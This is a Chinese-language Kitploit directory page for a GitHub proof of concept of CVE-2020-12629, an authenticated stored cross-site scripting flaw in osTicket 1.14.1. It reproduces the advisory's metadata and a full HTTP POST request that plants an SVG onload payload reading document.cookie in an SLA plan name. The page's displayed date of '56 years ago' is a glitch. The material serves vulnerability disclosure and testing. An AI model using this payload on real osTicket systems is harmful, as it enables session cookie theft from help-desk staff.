Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-12629 — osTicket 1.14.1 - 认证后持久型跨站脚本 | Kitploit
工具/GitHubGitHub/mkelepce/cve-2020-12629
漏洞分析代码分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmkelepce/cve-2020-12629

CVE-2020-12629

osTicket 1.14.1 - 认证后持久型跨站脚本

查看仓库
56年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

osTicket 1.14.1 - 持久性认证跨站脚本
作者:Mehmet Kelepce / Gais Cyber Security
日期:2020-03-24
来源链接:https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
CVE:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12629
Exploit-Db:https://www.exploit-db.com/exploits/48413
厂商:http://osticket.com
可远程利用:是
动态编码语言:PHP
CVSSv3 基础评分:7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

此漏洞是通过检查源代码发现的。

PoC:工单SLA计划名称 - HTTP POST请求
-----
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&CSRFToken=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

受影响参数:name
参数文件:/scp/slass.php

我对任何工单都使用了SLA的名称。

风险:目标用户的cookie信息将被获取。

下载工具